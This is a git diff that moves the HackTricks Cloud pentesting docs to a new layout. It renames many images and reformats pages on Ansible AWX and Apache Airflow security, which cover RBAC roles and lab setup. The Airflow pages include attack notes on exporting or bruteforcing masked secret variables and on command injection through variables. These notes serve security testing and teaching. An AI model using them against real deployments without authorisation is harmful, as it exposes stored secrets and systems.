diff --git a/.gitbook/assets/image (69).png b/src/images/image (69).png
similarity index 100%
rename from .gitbook/assets/image (69).png
rename to src/images/image (69).png
diff --git a/.gitbook/assets/image (7) (1) (1) (1).png b/src/images/image (7) (1) (1) (1).png
similarity index 100%
rename from .gitbook/assets/image (7) (1) (1) (1).png
rename to src/images/image (7) (1) (1) (1).png
diff --git a/.gitbook/assets/image (7) (1) (1) (2).png b/src/images/image (7) (1) (1) (2).png
similarity index 100%
rename from .gitbook/assets/image (7) (1) (1) (2).png
rename to src/images/image (7) (1) (1) (2).png
diff --git a/.gitbook/assets/image (7) (1) (1).png b/src/images/image (7) (1) (1).png
similarity index 100%
rename from .gitbook/assets/image (7) (1) (1).png
rename to src/images/image (7) (1) (1).png
diff --git a/.gitbook/assets/image (7) (1) (2) (1).png b/src/images/image (7) (1) (2) (1).png
similarity index 100%
rename from .gitbook/assets/image (7) (1) (2) (1).png
rename to src/images/image (7) (1) (2) (1).png
diff --git a/.gitbook/assets/image (7) (1) (2).png b/src/images/image (7) (1) (2).png
similarity index 100%
rename from .gitbook/assets/image (7) (1) (2).png
rename to src/images/image (7) (1) (2).png
diff --git a/.gitbook/assets/image (7) (1).png b/src/images/image (7) (1).png
similarity index 100%
rename from .gitbook/assets/image (7) (1).png
rename to src/images/image (7) (1).png
diff --git a/.gitbook/assets/image (7) (2).png b/src/images/image (7) (2).png
similarity index 100%
rename from .gitbook/assets/image (7) (2).png
rename to src/images/image (7) (2).png
diff --git a/.gitbook/assets/image (7).png b/src/images/image (7).png
similarity index 100%
rename from .gitbook/assets/image (7).png
rename to src/images/image (7).png
diff --git a/.gitbook/assets/image (70).png b/src/images/image (70).png
similarity index 100%
rename from .gitbook/assets/image (70).png
rename to src/images/image (70).png
diff --git a/.gitbook/assets/image (71).png b/src/images/image (71).png
similarity index 100%
rename from .gitbook/assets/image (71).png
rename to src/images/image (71).png
diff --git a/.gitbook/assets/image (72).png b/src/images/image (72).png
similarity index 100%
rename from .gitbook/assets/image (72).png
rename to src/images/image (72).png
diff --git a/.gitbook/assets/image (73).png b/src/images/image (73).png
similarity index 100%
rename from .gitbook/assets/image (73).png
rename to src/images/image (73).png
diff --git a/.gitbook/assets/image (74).png b/src/images/image (74).png
similarity index 100%
rename from .gitbook/assets/image (74).png
rename to src/images/image (74).png
diff --git a/.gitbook/assets/image (75).png b/src/images/image (75).png
similarity index 100%
rename from .gitbook/assets/image (75).png
rename to src/images/image (75).png
diff --git a/.gitbook/assets/image (76).png b/src/images/image (76).png
similarity index 100%
rename from .gitbook/assets/image (76).png
rename to src/images/image (76).png
diff --git a/.gitbook/assets/image (77).png b/src/images/image (77).png
similarity index 100%
rename from .gitbook/assets/image (77).png
rename to src/images/image (77).png
diff --git a/.gitbook/assets/image (78).png b/src/images/image (78).png
similarity index 100%
rename from .gitbook/assets/image (78).png
rename to src/images/image (78).png
diff --git a/.gitbook/assets/image (79).png b/src/images/image (79).png
similarity index 100%
rename from .gitbook/assets/image (79).png
rename to src/images/image (79).png
diff --git a/.gitbook/assets/image (8) (1) (1) (1) (1) (1).png b/src/images/image (8) (1) (1) (1) (1) (1).png
similarity index 100%
rename from .gitbook/assets/image (8) (1) (1) (1) (1) (1).png
rename to src/images/image (8) (1) (1) (1) (1) (1).png
diff --git a/.gitbook/assets/image (8) (1) (1) (1) (1).png b/src/images/image (8) (1) (1) (1) (1).png
similarity index 100%
rename from .gitbook/assets/image (8) (1) (1) (1) (1).png
rename to src/images/image (8) (1) (1) (1) (1).png
diff --git a/.gitbook/assets/image (8) (1) (1) (1).png b/src/images/image (8) (1) (1) (1).png
similarity index 100%
rename from .gitbook/assets/image (8) (1) (1) (1).png
rename to src/images/image (8) (1) (1) (1).png
diff --git a/.gitbook/assets/image (8) (1) (1).png b/src/images/image (8) (1) (1).png
similarity index 100%
rename from .gitbook/assets/image (8) (1) (1).png
rename to src/images/image (8) (1) (1).png
diff --git a/.gitbook/assets/image (8) (1).png b/src/images/image (8) (1).png
similarity index 100%
rename from .gitbook/assets/image (8) (1).png
rename to src/images/image (8) (1).png
diff --git a/.gitbook/assets/image (8) (2).png b/src/images/image (8) (2).png
similarity index 100%
rename from .gitbook/assets/image (8) (2).png
rename to src/images/image (8) (2).png
diff --git a/.gitbook/assets/image (8) (3).png b/src/images/image (8) (3).png
similarity index 100%
rename from .gitbook/assets/image (8) (3).png
rename to src/images/image (8) (3).png
diff --git a/.gitbook/assets/image (8).png b/src/images/image (8).png
similarity index 100%
rename from .gitbook/assets/image (8).png
rename to src/images/image (8).png
diff --git a/.gitbook/assets/image (80).png b/src/images/image (80).png
similarity index 100%
rename from .gitbook/assets/image (80).png
rename to src/images/image (80).png
diff --git a/.gitbook/assets/image (81).png b/src/images/image (81).png
similarity index 100%
rename from .gitbook/assets/image (81).png
rename to src/images/image (81).png
diff --git a/.gitbook/assets/image (82).png b/src/images/image (82).png
similarity index 100%
rename from .gitbook/assets/image (82).png
rename to src/images/image (82).png
diff --git a/.gitbook/assets/image (83) (1).png b/src/images/image (83) (1).png
similarity index 100%
rename from .gitbook/assets/image (83) (1).png
rename to src/images/image (83) (1).png
diff --git a/.gitbook/assets/image (83).png b/src/images/image (83).png
similarity index 100%
rename from .gitbook/assets/image (83).png
rename to src/images/image (83).png
diff --git a/.gitbook/assets/image (84).png b/src/images/image (84).png
similarity index 100%
rename from .gitbook/assets/image (84).png
rename to src/images/image (84).png
diff --git a/.gitbook/assets/image (85) (1).png b/src/images/image (85) (1).png
similarity index 100%
rename from .gitbook/assets/image (85) (1).png
rename to src/images/image (85) (1).png
diff --git a/.gitbook/assets/image (85).png b/src/images/image (85).png
similarity index 100%
rename from .gitbook/assets/image (85).png
rename to src/images/image (85).png
diff --git a/.gitbook/assets/image (86).png b/src/images/image (86).png
similarity index 100%
rename from .gitbook/assets/image (86).png
rename to src/images/image (86).png
diff --git a/.gitbook/assets/image (87) (1).png b/src/images/image (87) (1).png
similarity index 100%
rename from .gitbook/assets/image (87) (1).png
rename to src/images/image (87) (1).png
diff --git a/.gitbook/assets/image (87).png b/src/images/image (87).png
similarity index 100%
rename from .gitbook/assets/image (87).png
rename to src/images/image (87).png
diff --git a/.gitbook/assets/image (88).png b/src/images/image (88).png
similarity index 100%
rename from .gitbook/assets/image (88).png
rename to src/images/image (88).png
diff --git a/.gitbook/assets/image (89) (1).png b/src/images/image (89) (1).png
similarity index 100%
rename from .gitbook/assets/image (89) (1).png
rename to src/images/image (89) (1).png
diff --git a/.gitbook/assets/image (89).png b/src/images/image (89).png
similarity index 100%
rename from .gitbook/assets/image (89).png
rename to src/images/image (89).png
diff --git a/.gitbook/assets/image (9) (1) (1) (1) (1).png b/src/images/image (9) (1) (1) (1) (1).png
similarity index 100%
rename from .gitbook/assets/image (9) (1) (1) (1) (1).png
rename to src/images/image (9) (1) (1) (1) (1).png
diff --git a/.gitbook/assets/image (9) (1) (1) (1).png b/src/images/image (9) (1) (1) (1).png
similarity index 100%
rename from .gitbook/assets/image (9) (1) (1) (1).png
rename to src/images/image (9) (1) (1) (1).png
diff --git a/.gitbook/assets/image (9) (1) (1).png b/src/images/image (9) (1) (1).png
similarity index 100%
rename from .gitbook/assets/image (9) (1) (1).png
rename to src/images/image (9) (1) (1).png
diff --git a/.gitbook/assets/image (9) (1).png b/src/images/image (9) (1).png
similarity index 100%
rename from .gitbook/assets/image (9) (1).png
rename to src/images/image (9) (1).png
diff --git a/.gitbook/assets/image (9) (2).png b/src/images/image (9) (2).png
similarity index 100%
rename from .gitbook/assets/image (9) (2).png
rename to src/images/image (9) (2).png
diff --git a/.gitbook/assets/image (9).png b/src/images/image (9).png
similarity index 100%
rename from .gitbook/assets/image (9).png
rename to src/images/image (9).png
diff --git a/.gitbook/assets/image (90).png b/src/images/image (90).png
similarity index 100%
rename from .gitbook/assets/image (90).png
rename to src/images/image (90).png
diff --git a/.gitbook/assets/image (91).png b/src/images/image (91).png
similarity index 100%
rename from .gitbook/assets/image (91).png
rename to src/images/image (91).png
diff --git a/.gitbook/assets/image (92) (1) (1).png b/src/images/image (92) (1) (1).png
similarity index 100%
rename from .gitbook/assets/image (92) (1) (1).png
rename to src/images/image (92) (1) (1).png
diff --git a/.gitbook/assets/image (92) (1).png b/src/images/image (92) (1).png
similarity index 100%
rename from .gitbook/assets/image (92) (1).png
rename to src/images/image (92) (1).png
diff --git a/.gitbook/assets/image (92).png b/src/images/image (92).png
similarity index 100%
rename from .gitbook/assets/image (92).png
rename to src/images/image (92).png
diff --git a/.gitbook/assets/image (93).png b/src/images/image (93).png
similarity index 100%
rename from .gitbook/assets/image (93).png
rename to src/images/image (93).png
diff --git a/.gitbook/assets/image (94).png b/src/images/image (94).png
similarity index 100%
rename from .gitbook/assets/image (94).png
rename to src/images/image (94).png
diff --git a/.gitbook/assets/image (95).png b/src/images/image (95).png
similarity index 100%
rename from .gitbook/assets/image (95).png
rename to src/images/image (95).png
diff --git a/.gitbook/assets/image (96).png b/src/images/image (96).png
similarity index 100%
rename from .gitbook/assets/image (96).png
rename to src/images/image (96).png
diff --git a/.gitbook/assets/image (97).png b/src/images/image (97).png
similarity index 100%
rename from .gitbook/assets/image (97).png
rename to src/images/image (97).png
diff --git a/.gitbook/assets/image (98).png b/src/images/image (98).png
similarity index 100%
rename from .gitbook/assets/image (98).png
rename to src/images/image (98).png
diff --git a/.gitbook/assets/image (99).png b/src/images/image (99).png
similarity index 100%
rename from .gitbook/assets/image (99).png
rename to src/images/image (99).png
diff --git a/.gitbook/assets/image.png b/src/images/image.png
similarity index 100%
rename from .gitbook/assets/image.png
rename to src/images/image.png
diff --git a/.gitbook/assets/openshift-missing-service-account-image1.png b/src/images/openshift-missing-service-account-image1.png
similarity index 100%
rename from .gitbook/assets/openshift-missing-service-account-image1.png
rename to src/images/openshift-missing-service-account-image1.png
diff --git a/.gitbook/assets/openshift-missing-service-account-image2.png b/src/images/openshift-missing-service-account-image2.png
similarity index 100%
rename from .gitbook/assets/openshift-missing-service-account-image2.png
rename to src/images/openshift-missing-service-account-image2.png
diff --git a/src/images/sponsor_8ksec.png b/src/images/sponsor_8ksec.png
new file mode 100644
index 000000000..1d751216b
Binary files /dev/null and b/src/images/sponsor_8ksec.png differ
diff --git a/src/images/sponsor_hackenproof.jpeg b/src/images/sponsor_hackenproof.jpeg
new file mode 100644
index 000000000..a4c6bc6f4
Binary files /dev/null and b/src/images/sponsor_hackenproof.jpeg differ
diff --git a/src/images/sponsor_intigriti.png b/src/images/sponsor_intigriti.png
new file mode 100644
index 000000000..b7944f7d8
Binary files /dev/null and b/src/images/sponsor_intigriti.png differ
diff --git a/src/images/sponsor_pentesttools.webp b/src/images/sponsor_pentesttools.webp
new file mode 100644
index 000000000..1b5a0d663
Binary files /dev/null and b/src/images/sponsor_pentesttools.webp differ
diff --git a/src/images/sponsor_rootedcon.png b/src/images/sponsor_rootedcon.png
new file mode 100644
index 000000000..cf4e8a20a
Binary files /dev/null and b/src/images/sponsor_rootedcon.png differ
diff --git a/src/images/sponsor_stm.png b/src/images/sponsor_stm.png
new file mode 100644
index 000000000..e45c021c8
Binary files /dev/null and b/src/images/sponsor_stm.png differ
diff --git a/src/images/sponsor_trickest.jpeg b/src/images/sponsor_trickest.jpeg
new file mode 100644
index 000000000..92331426b
Binary files /dev/null and b/src/images/sponsor_trickest.jpeg differ
diff --git a/.gitbook/assets/telegram-cloud-document-4-5875069018120918586.jpg b/src/images/telegram-cloud-document-4-5875069018120918586.jpg
similarity index 100%
rename from .gitbook/assets/telegram-cloud-document-4-5875069018120918586.jpg
rename to src/images/telegram-cloud-document-4-5875069018120918586.jpg
diff --git a/.gitbook/assets/telegram-cloud-photo-size-4-5780773316536156543-x.jpg b/src/images/telegram-cloud-photo-size-4-5780773316536156543-x.jpg
similarity index 100%
rename from .gitbook/assets/telegram-cloud-photo-size-4-5780773316536156543-x.jpg
rename to src/images/telegram-cloud-photo-size-4-5780773316536156543-x.jpg
diff --git a/.gitbook/assets/telegram-cloud-photo-size-4-5782633230648853886-y.jpg b/src/images/telegram-cloud-photo-size-4-5782633230648853886-y.jpg
similarity index 100%
rename from .gitbook/assets/telegram-cloud-photo-size-4-5782633230648853886-y.jpg
rename to src/images/telegram-cloud-photo-size-4-5782633230648853886-y.jpg
diff --git a/.gitbook/assets/telegram-cloud-photo-size-4-5920521132757336440-y.jpg b/src/images/telegram-cloud-photo-size-4-5920521132757336440-y.jpg
similarity index 100%
rename from .gitbook/assets/telegram-cloud-photo-size-4-5920521132757336440-y.jpg
rename to src/images/telegram-cloud-photo-size-4-5920521132757336440-y.jpg
diff --git a/.gitbook/assets/telegram-cloud-photo-size-4-6044191430395675441-x.jpg b/src/images/telegram-cloud-photo-size-4-6044191430395675441-x.jpg
similarity index 100%
rename from .gitbook/assets/telegram-cloud-photo-size-4-6044191430395675441-x.jpg
rename to src/images/telegram-cloud-photo-size-4-6044191430395675441-x.jpg
diff --git a/pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md b/src/pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md
similarity index 51%
rename from pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md
rename to src/pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md
index 8098117c1..db07fc286 100644
--- a/pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md
+++ b/src/pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md
@@ -1,19 +1,6 @@ # Ansible Tower / AWX / Automation controller Security -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../banners/hacktricks-training.md}} ## Basic Information 
@@ -27,51 +14,50 @@ According to [**this**](https://blog.devops.dev/ansible-tower-vs-awx-under-the-h ### Tech Stack -* **Web Interface**: This is the graphical interface where users can manage inventories, credentials, templates, and jobs. It's designed to be intuitive and provides visualizations to help with understanding the state and results of your automation jobs. -* **REST API**: Everything you can do in the web interface, you can also do via the REST API. This means you can integrate AWX/Tower with other systems or script actions that you'd typically perform in the interface. -* **Database**: AWX/Tower uses a database (typically PostgreSQL) to store its configuration, job results, and other necessary operational data. -* **RabbitMQ**: This is the messaging system used by AWX/Tower to communicate between the different components, especially between the web service and the task runners. -* **Redis**: Redis serves as a cache and a backend for the task queue. +- **Web Interface**: This is the graphical interface where users can manage inventories, credentials, templates, and jobs. It's designed to be intuitive and provides visualizations to help with understanding the state and results of your automation jobs. +- **REST API**: Everything you can do in the web interface, you can also do via the REST API. This means you can integrate AWX/Tower with other systems or script actions that you'd typically perform in the interface. +- **Database**: AWX/Tower uses a database (typically PostgreSQL) to store its configuration, job results, and other necessary operational data. +- **RabbitMQ**: This is the messaging system used by AWX/Tower to communicate between the different components, especially between the web service and the task runners. +- **Redis**: Redis serves as a cache and a backend for the task queue. ### Logical Components -* **Inventories**: An inventory is a **collection of hosts (or nodes)** against which **jobs** (Ansible playbooks) can be **run**. 
AWX/Tower allows you to define and group your inventories and also supports dynamic inventories which can **fetch host lists from other systems** like AWS, Azure, etc. -* **Projects**: A project is essentially a **collection of Ansible playbooks** sourced from a **version control system** (like Git) to pull the latest playbooks when needed.. -* **Templates**: Job templates define **how a particular playbook will be run**, specifying the **inventory**, **credentials**, and other **parameters** for the job. -* **Credentials**: AWX/Tower provides a secure way to **manage and store secrets, such as SSH keys, passwords, and API tokens**. These credentials can be associated with job templates so that playbooks have the necessary access when they run. -* **Task Engine**: This is where the magic happens. The task engine is built on Ansible and is responsible for **running the playbooks**. Jobs are dispatched to the task engine, which then runs the Ansible playbooks against the designated inventory using the specified credentials. -* **Schedulers and Callbacks**: These are advanced features in AWX/Tower that allow **jobs to be scheduled** to run at specific times or triggered by external events. -* **Notifications**: AWX/Tower can send notifications based on the success or failure of jobs. It supports various means of notifications such as emails, Slack messages, webhooks, etc. -* **Ansible Playbooks**: Ansible playbooks are configuration, deployment, and orchestration tools. They describe the desired state of systems in an automated, repeatable way. Written in YAML, playbooks use Ansible's declarative automation language to describe configurations, tasks, and steps that need to be executed. +- **Inventories**: An inventory is a **collection of hosts (or nodes)** against which **jobs** (Ansible playbooks) can be **run**. 
AWX/Tower allows you to define and group your inventories and also supports dynamic inventories which can **fetch host lists from other systems** like AWS, Azure, etc. +- **Projects**: A project is essentially a **collection of Ansible playbooks** sourced from a **version control system** (like Git) to pull the latest playbooks when needed.. +- **Templates**: Job templates define **how a particular playbook will be run**, specifying the **inventory**, **credentials**, and other **parameters** for the job. +- **Credentials**: AWX/Tower provides a secure way to **manage and store secrets, such as SSH keys, passwords, and API tokens**. These credentials can be associated with job templates so that playbooks have the necessary access when they run. +- **Task Engine**: This is where the magic happens. The task engine is built on Ansible and is responsible for **running the playbooks**. Jobs are dispatched to the task engine, which then runs the Ansible playbooks against the designated inventory using the specified credentials. +- **Schedulers and Callbacks**: These are advanced features in AWX/Tower that allow **jobs to be scheduled** to run at specific times or triggered by external events. +- **Notifications**: AWX/Tower can send notifications based on the success or failure of jobs. It supports various means of notifications such as emails, Slack messages, webhooks, etc. +- **Ansible Playbooks**: Ansible playbooks are configuration, deployment, and orchestration tools. They describe the desired state of systems in an automated, repeatable way. Written in YAML, playbooks use Ansible's declarative automation language to describe configurations, tasks, and steps that need to be executed. ### Job Execution Flow 1. **User Interaction**: A user can interact with AWX/Tower either through the **Web Interface** or the **REST API**. These provide front-end access to all the functionalities offered by AWX/Tower. 2. 
**Job Initiation**: - * The user, via the Web Interface or API, initiates a job based on a **Job Template**. - * The Job Template includes references to the **Inventory**, **Project** (containing the playbook), and **Credentials**. - * Upon job initiation, a request is sent to the AWX/Tower backend to queue the job for execution. + - The user, via the Web Interface or API, initiates a job based on a **Job Template**. + - The Job Template includes references to the **Inventory**, **Project** (containing the playbook), and **Credentials**. + - Upon job initiation, a request is sent to the AWX/Tower backend to queue the job for execution. 3. **Job Queuing**: - * **RabbitMQ** handles the messaging between the web component and the task runners. Once a job is initiated, a message is dispatched to the task engine using RabbitMQ. - * **Redis** acts as the backend for the task queue, managing queued jobs awaiting execution. + - **RabbitMQ** handles the messaging between the web component and the task runners. Once a job is initiated, a message is dispatched to the task engine using RabbitMQ. + - **Redis** acts as the backend for the task queue, managing queued jobs awaiting execution. 4. **Job Execution**: - * The **Task Engine** picks up the queued job. It retrieves the necessary information from the **Database** about the job's associated playbook, inventory, and credentials. - * Using the retrieved Ansible playbook from the associated **Project**, the Task Engine runs the playbook against the specified **Inventory** nodes using the provided **Credentials**. - * As the playbook runs, its execution output (logs, facts, etc.) gets captured and stored in the **Database**. + - The **Task Engine** picks up the queued job. It retrieves the necessary information from the **Database** about the job's associated playbook, inventory, and credentials. 
+ - Using the retrieved Ansible playbook from the associated **Project**, the Task Engine runs the playbook against the specified **Inventory** nodes using the provided **Credentials**. + - As the playbook runs, its execution output (logs, facts, etc.) gets captured and stored in the **Database**. 5. **Job Results**: - * Once the playbook finishes running, the results (success, failure, logs) are saved to the **Database**. - * Users can then view the results through the Web Interface or query them via the REST API. - * Based on job outcomes, **Notifications** can be dispatched to inform users or external systems about the job's status. Notifications could be emails, Slack messages, webhooks, etc. + - Once the playbook finishes running, the results (success, failure, logs) are saved to the **Database**. + - Users can then view the results through the Web Interface or query them via the REST API. + - Based on job outcomes, **Notifications** can be dispatched to inform users or external systems about the job's status. Notifications could be emails, Slack messages, webhooks, etc. 6. **External Systems Integration**: - * **Inventories** can be dynamically sourced from external systems, allowing AWX/Tower to pull in hosts from sources like AWS, Azure, VMware, and more. - * **Projects** (playbooks) can be fetched from version control systems, ensuring the use of up-to-date playbooks during job execution. - * **Schedulers and Callbacks** can be used to integrate with other systems or tools, making AWX/Tower react to external triggers or run jobs at predetermined times. + - **Inventories** can be dynamically sourced from external systems, allowing AWX/Tower to pull in hosts from sources like AWS, Azure, VMware, and more. + - **Projects** (playbooks) can be fetched from version control systems, ensuring the use of up-to-date playbooks during job execution. 
+ - **Schedulers and Callbacks** can be used to integrate with other systems or tools, making AWX/Tower react to external triggers or run jobs at predetermined times. ### AWX lab creation for testing [**Following the docs**](https://github.com/ansible/awx/blob/devel/tools/docker-compose/README.md) it's possible to use docker-compose to run AWX: -{% code overflow="wrap" %} ```bash git clone -b x.y.z https://github.com/ansible/awx.git # Get in x.y.z the latest release version @@ -97,7 +83,6 @@ docker exec -ti tools_awx_1 awx-manage createsuperuser # Load demo data docker exec tools_awx_1 awx-manage create_preload_data ``` -{% endcode %} ## RBAC 
@@ -112,56 +97,43 @@ From a **white box security** review, you would need the **System Auditor role** Expand this to get detailed description of available roles 1. **System Administrator**: - * This is the superuser role with permissions to access and modify any resource in the system. - * They can manage all organizations, teams, projects, inventories, job templates, etc. + - This is the superuser role with permissions to access and modify any resource in the system. + - They can manage all organizations, teams, projects, inventories, job templates, etc. 2. **System Auditor**: - * Users with this role can view all system data but cannot make any changes. - * This role is designed for compliance and oversight. + - Users with this role can view all system data but cannot make any changes. + - This role is designed for compliance and oversight. 3. **Organization Roles**: - * **Admin**: Full control over the organization's resources. - * **Auditor**: View-only access to the organization's resources. - * **Member**: Basic membership in an organization without any specific permissions. - * **Execute**: Can run job templates within the organization. - * **Read**: Can view the organization’s resources. + - **Admin**: Full control over the organization's resources. + - **Auditor**: View-only access to the organization's resources. + - **Member**: Basic membership in an organization without any specific permissions. + - **Execute**: Can run job templates within the organization. + - **Read**: Can view the organization’s resources. 4. **Project Roles**: - * **Admin**: Can manage and modify the project. - * **Use**: Can use the project in a job template. - * **Update**: Can update project using SCM (source control). + - **Admin**: Can manage and modify the project. + - **Use**: Can use the project in a job template. + - **Update**: Can update project using SCM (source control). 5. **Inventory Roles**: - * **Admin**: Can manage and modify the inventory. 
- * **Ad Hoc**: Can run ad hoc commands on the inventory. - * **Update**: Can update the inventory source. - * **Use**: Can use the inventory in a job template. - * **Read**: View-only access. + - **Admin**: Can manage and modify the inventory. + - **Ad Hoc**: Can run ad hoc commands on the inventory. + - **Update**: Can update the inventory source. + - **Use**: Can use the inventory in a job template. + - **Read**: View-only access. 6. **Job Template Roles**: - * **Admin**: Can manage and modify the job template. - * **Execute**: Can run the job. - * **Read**: View-only access. + - **Admin**: Can manage and modify the job template. + - **Execute**: Can run the job. + - **Read**: View-only access. 7. **Credential Roles**: - * **Admin**: Can manage and modify the credentials. - * **Use**: Can use the credentials in job templates or other relevant resources. - * **Read**: View-only access. + - **Admin**: Can manage and modify the credentials. + - **Use**: Can use the credentials in job templates or other relevant resources. + - **Read**: View-only access. 8. **Team Roles**: - * **Member**: Part of the team but without any specific permissions. - * **Admin**: Can manage the team's members and associated resources. + - **Member**: Part of the team but without any specific permissions. + - **Admin**: Can manage the team's members and associated resources. 9. **Workflow Roles**: - * **Admin**: Can manage and modify the workflow. - * **Execute**: Can run the workflow. - * **Read**: View-only access. + - **Admin**: Can manage and modify the workflow. + - **Execute**: Can run the workflow. + - **Read**: View-only access. -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../banners/hacktricks-training.md}} diff --git a/pentesting-ci-cd/apache-airflow-security/README.md b/src/pentesting-ci-cd/apache-airflow-security/README.md similarity index 69% rename from pentesting-ci-cd/apache-airflow-security/README.md rename to src/pentesting-ci-cd/apache-airflow-security/README.md index fac6233fb..5da57b39d 100644 --- a/pentesting-ci-cd/apache-airflow-security/README.md +++ b/src/pentesting-ci-cd/apache-airflow-security/README.md @@ -1,19 +1,6 @@ # Apache Airflow Security -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../banners/hacktricks-training.md}} ### Basic Information @@ -45,17 +32,17 @@ helm delete airflow-release Airflow might store **sensitive information** in its configuration or you can find weak configurations in place: -{% content-ref url="airflow-configuration.md" %} -[airflow-configuration.md](airflow-configuration.md) -{% endcontent-ref %} +{{#ref}} +airflow-configuration.md +{{#endref}} ### Airflow RBAC Before start attacking Airflow you should understand **how permissions work**: -{% content-ref url="airflow-rbac.md" %} -[airflow-rbac.md](airflow-rbac.md) -{% endcontent-ref %} +{{#ref}} +airflow-rbac.md +{{#endref}} ### Attacks 
@@ -63,25 +50,25 @@ Before start attacking Airflow you should understand **how permissions work**: If you have **access to the web console** you might be able to access some or all of the following information: -* **Variables** (Custom sensitive information might be stored here) -* **Connections** (Custom sensitive information might be stored here) - * Access them in `http:///connection/list/` -* [**Configuration**](./#airflow-configuration) (Sensitive information like the **`secret_key`** and passwords might be stored here) -* List **users & roles** -* **Code of each DAG** (which might contain interesting info) +- **Variables** (Custom sensitive information might be stored here) +- **Connections** (Custom sensitive information might be stored here) + - Access them in `http:///connection/list/` +- [**Configuration**](./#airflow-configuration) (Sensitive information like the **`secret_key`** and passwords might be stored here) +- List **users & roles** +- **Code of each DAG** (which might contain interesting info) #### Retrieve Variables Values Variables can be stored in Airflow so the **DAGs** can **access** their values. It's similar to secrets of other platforms. If you have **enough permissions** you can access them in the GUI in `http:///variable/list/`.\ Airflow by default will show the value of the variable in the GUI, however, according to [**this**](https://marclamberti.com/blog/variables-with-apache-airflow/) it's possible to set a **list of variables** whose **value** will appear as **asterisks** in the **GUI**. 
-![](<../../.gitbook/assets/image (164).png>) +![](<../../images/image (164).png>) However, these **values** can still be **retrieved** via **CLI** (you need to have DB access), **arbitrary DAG** execution, **API** accessing the variables endpoint (the API needs to be activated), and **even the GUI itself!**\ To access those values from the GUI just **select the variables** you want to access and **click on Actions -> Export**.\ Another way is to perform a **bruteforce** to the **hidden value** using the **search filtering** it until you get it: -![](<../../.gitbook/assets/image (152).png>) +![](<../../images/image (152).png>) #### Privilege Escalation @@ -185,17 +172,4 @@ foo = Variable.get("foo") If they are used for example inside a a bash command, you could perform a command injection. -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/pentesting-ci-cd/apache-airflow-security/airflow-configuration.md b/src/pentesting-ci-cd/apache-airflow-security/airflow-configuration.md new file mode 100644 index 000000000..666d49577 --- /dev/null +++ b/src/pentesting-ci-cd/apache-airflow-security/airflow-configuration.md 
@@ -0,0 +1,111 @@ +# Airflow Configuration + +{{#include ../../banners/hacktricks-training.md}} + +## Configuration File + +**Apache Airflow** generates a **config file** in all the airflow machines called **`airflow.cfg`** in the home of the airflow user. This config file contains configuration information and **might contain interesting and sensitive information.** + +**There are two ways to access this file: By compromising some airflow machine, or accessing the web console.** + +Note that the **values inside the config file** **might not be the ones used**, as you can overwrite them setting env variables such as `AIRFLOW__WEBSERVER__EXPOSE_CONFIG: 'true'`. + +If you have access to the **config file in the web server**, you can check the **real running configuration** in the same page the config is displayed.\ +If you have **access to some machine inside the airflow env**, check the **environment**. + +Some interesting values to check when reading the config file: + +### \[api] + +- **`access_control_allow_headers`**: This indicates the **allowed** **headers** for **CORS** +- **`access_control_allow_methods`**: This indicates the **allowed methods** for **CORS** +- **`access_control_allow_origins`**: This indicates the **allowed origins** for **CORS** +- **`auth_backend`**: [**According to the docs**](https://airflow.apache.org/docs/apache-airflow/stable/security/api.html) a few options can be 